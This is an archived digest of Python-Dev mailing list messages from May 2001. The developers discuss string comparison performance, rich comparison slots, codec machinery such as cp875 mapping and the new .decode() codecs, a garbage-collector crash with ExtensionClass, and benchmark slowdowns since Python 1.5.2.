> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain?  BTW, some
compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of
course assuming it *isn't* is also a x-platform trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                    1784897
> lens_decide_firstbyte_wouldhave:1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net*
effect is muddy at best.

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples containing
strings, etc) -- .sort() never uses pyEQ (it only uses pyLT).

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or one of
the search tree modules out there, it's easy to buy that PyEQ is most common
for strings.  What's not clear is that adding a rich comparison slot actually
helps overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs, adding it
there instead).  It's clearer that this is going to hurt sorting (& bisect
etc), by adding yet another layer of function call to get Py_LT resolved (as
for dict compares too, the string richcmp can't do anything to speed up Py_LT
that string oldcmp can't do just as efficiently -- indeed, that's the great
advantage oldcmp's "compare first character" test had:  that *can* decide
Py_LT in one byte much of the time (but length comparison cannot)).

Note too earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program a
search tree, because cmp() *used* to call a string comparison routine only
once; but after adding a richcmp slot, each cmp(string1, string2) will call
the richcmp slot from 1 thru 3 times (data-dependent)).

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&
    group_id=5470&atid=305470

Heh:  let's grab all the ugly URLs off of SourceForge, stick them in a giant
list, and sort them.  Can't think of a more typical app than that <wink>.

Thanks for the work, Martin!


From tim.one@home.com  Wed May 16 09:51:17 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue:  when you're too lazy to try to subtact out loop overhead (not a
knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a
single object (as it's repeatedly bound to "i" across iterations), instead of
slobbering all over memory inc'ing and dec'ing a million distinct objects.

there's-as-an-art-to-doing-nothing-quickly-ly y'rs  - tim


From tim.one@home.com  Wed May 16 09:56:56 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
what a lon was.  But not as surprised that I didn't try to blame this on a
Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

Too much work anyway.  They can have mine:  703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim


From esr@thyrsus.com  Wed May 16 10:17:09 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com> <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters <tim.one@home.com>:
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
> 
> [Eric S. Raymond]
> > No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.
> 
> Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
> what a lon was.  But not as surprised that I didn't try to blame this on a
> Outlook 2000 bug.
> 
> > (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> > phone numbers.  Pthfthfthpht...)
> 
> Too much work anyway.  They can have mine:  703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin bikini?

Duh.  Answer obvious: the one I can talk *out* of a snakeskin bikini most 
rapidly afterwards.  Then I'll give her your number -- that is, if
I don't get too, er, distracted.

	seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.


From mal@lemburg.com  Wed May 16 10:29:49 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
> 
> Since I use 7-bit ASCII exclusively, I've been using
> 
>     encode = decode = lambda x: x
> 
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible
input characters should pass the round-trip test, that is

	encoded text -> Unicode -> encoded text

should result in the identiy mapping for all c in map(chr,range(256)).
 
> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
> 
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None.  Better safe than sorry, by
> default.  Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding
maps to codecs.py. This will simplify the task of choosing the
"right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurrs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple character to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API
in codecs.py which checks the decoding map and postprocesses
it in case it finds a problem ?!

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Wed May 16 10:32:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
> 
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
> 
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type
checkins will make this possible in 2.2 or 2.3. The same
should then be done for numbers, sequences and mappings (all
abstract "types" defined in abstract.c).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Wed May 16 10:34:40 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:34:40 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <3B0249B0.5DD10A4C@lemburg.com>

Tim Peters wrote:
> 
> [Martin]
> > Producing numbers is easy :-)
> 
> If only making sense of them were too <0.6 wink>.

FYI, I've added a few compare tests to pybench which now is
available as version 0.9. You can download it from my Python
page.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh@python.net  Wed May 16 11:53:16 2001
From: mwh@python.net (Michael Hudson)
Date: 16 May 2001 11:53:16 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
Message-ID: <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>

Guido van Rossum <guido@digicool.com> writes:

> > I've just checked in a set of patches which implement the new
> > .decode() method along with a couple of useful codecs.
> 
> Cool!

Indeed.  Good idea, Marc!

This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets
raised for an illegal opcode, for example?).
 
> > To see just how easy it is to write codecs, please have
> > a look at the string codecs I added in this patch (e.g.
> > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > are a lot more useful things in the standard lib which could
> > benefit from these easy-to-use interfaces.
> 
> As an excercise, I added a quoted-printable codec.  It was easy
> indeed!

urlencode would be nice.  Maybe re.escape, too.  html entities?
That's probably a bigger can of worms, but 

print "<p>%s</p>"%text.encode("html")

seems delightfully simpleminded.

Cheers,
M.

-- 
  GAG: I think this is perfectly normal behaviour for a Vogon. ...
VOGON: That is exactly what you always say.
  GAG: Well, I think that is probably perfectly normal behaviour for a
      psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mal@lemburg.com  Wed May 16 12:06:14 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 13:06:14 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B025F26.A625DE02@lemburg.com>

Michael Hudson wrote:
> 
> Guido van Rossum <guido@digicool.com> writes:
> 
> > > I've just checked in a set of patches which implement the new
> > > .decode() method along with a couple of useful codecs.
> >
> > Cool!
> 
> Indeed.  Good idea, Marc!

Thanks :-)
 
> This is a bit unfriendly though:
> 
> >>> "bobbins".encode("gzip")
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
>     raise SystemError,\
> SystemError: module "encodings.gzip" failed to register
> 
> I thought SystemErrors shouldn't ever happen (isn't it what gets
> raised for an illegal opcode, for example?).

This is due to the zlib module not being installed. The reason
for the search function in encodings/__init__.py raising a
SystemError is that it did find a module named gzip, but this
module does not export the needed registration API getregentry().

Perhaps it should just raise a LookupError instead, though...
 
> > > To see just how easy it is to write codecs, please have
> > > a look at the string codecs I added in this patch (e.g.
> > > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > > are a lot more useful things in the standard lib which could
> > > benefit from these easy-to-use interfaces.
> >
> > As an excercise, I added a quoted-printable codec.  It was easy
> > indeed!
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "<p>%s</p>"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-) 

There are lots of those little "escape this, encode that" tasks 
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be a good to have wrapped as codecs.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh@python.net  Wed May 16 12:19:15 2001
From: mwh@python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk> <3B025F26.A625DE02@lemburg.com>
Message-ID: <m3y9rxmtho.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed. 

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.  

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "<p>%s</p>"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-) 

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks 
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be a good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme


From aahz@rahul.net  Wed May 16 14:16:18 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From barry@digicool.com  Wed May 16 14:42:15 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
 <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one@home.com> writes:

    TP> Random clue: when you're too lazy to try to subtact out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!


From guido@digicool.com  Wed May 16 16:01:40 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200."
 <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
 <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 16 16:24:55 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
 <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list squence types, and it describes
(albeing lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger. (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Wed May 16 15:28:04 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
 <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
 <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
 <3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be a good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip@pobox.com)
(847)971-7098


From fredrik@effbot.org  Wed May 16 16:07:18 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be a good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.

more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F


From nas@python.ca  Wed May 16 17:19:42 2001
From: nas@python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
366                             err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
op_type of NULL.  The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, 
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc, 
    class_name=0x402a9388 "GdkDragContext", 
    get_type=0x404d5c50 <gdk_drag_context_get_type>, ec=0x402bcc40, 
    bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps
this will help someone.

  Neil


From mal@lemburg.com  Wed May 16 17:24:57 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be a good to have wrapped as codecs.
> >
> > Why?  They operate on much more than strings.

Of course. 

Still their basic task is to take an object and
encode in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(); even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

	"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip@pobox.com (Skip Montanaro)  Wed May 16 18:44:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
 <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
 <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
 <3B025F26.A625DE02@lemburg.com>
 <15106.36468.62292.611515@beluga.mojam.com>
 <002101c0de19$e7875a90$e46940d5@hagrid>
 <3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode in some way
    mal> for dumps() and do the reverse for loads().  That's pretty much
    mal> what codecs normally do ;-)

Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here they have taken as input and returned as outputs
only strings or unicode objects.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.  Thanks for the explanation.

Skip


From mal@lemburg.com  Wed May 16 19:33:44 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After having read a little into the comparison thread, I tried
some performance compares on my own: the one between
the current CVS version and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the
same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the
figures show quite dramatic slow-downs. I'm not sure where they
result from, but they do concern me a bit, since the upgrade
path from 1.5.2 is probably the most common one to be expected
in user-land.

Since it is possible that these figures result from my specific 
machine setup, I'd like to know what other people see on their
machines.

Thanks.
--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                              per run    per oper.    diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us   +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us          
                 CompareFloats:     908.30 ms    2.02 us   +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us   +37.15%
               CompareIntegers:    1075.50 ms    1.19 us   +21.09%
                  CompareLongs:     989.40 ms    2.20 us   +47.12%
                CompareStrings:     844.80 ms    2.25 us   +33.99%
                CompareUnicode:    1018.65 ms    2.72 us       n/a
                 ConcatStrings:    1226.30 ms    8.18 us   +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us       n/a
               CreateInstances:    2094.05 ms   49.86 us  +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us  +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us       n/a
                  DictCreation:    2795.30 ms   18.64 us  +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us   +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us   +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us   +52.83%
                      ForLoops:     989.95 ms   99.00 us   -10.01%
                    IfThenElse:    1232.45 ms    1.83 us   +23.25%
                   ListSlicing:     621.40 ms  177.54 us          
                NestedForLoops:     986.60 ms    2.82 us   +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us   +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us   +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us   +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us   +42.19%
                     Recursion:     922.15 ms   73.77 us   +36.76%
                  SecondImport:    1055.45 ms   42.22 us  +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us   +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us   +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us  +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us   +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us          
       SimpleIntegerArithmetic:     839.00 ms    1.27 us          
        SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us  +100.43%
                    SmallLists:    2380.05 ms    9.33 us  +116.72%
                   SmallTuples:    1793.80 ms    7.47 us  +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us   +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
                StringMappings:    1601.50 ms   12.71 us       n/a
              StringPredicates:    1059.70 ms    3.78 us       n/a
                 StringSlicing:    1235.90 ms    7.06 us   +98.32%
                     TryExcept:    1272.55 ms    0.85 us   +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us   +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us   +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us       n/a
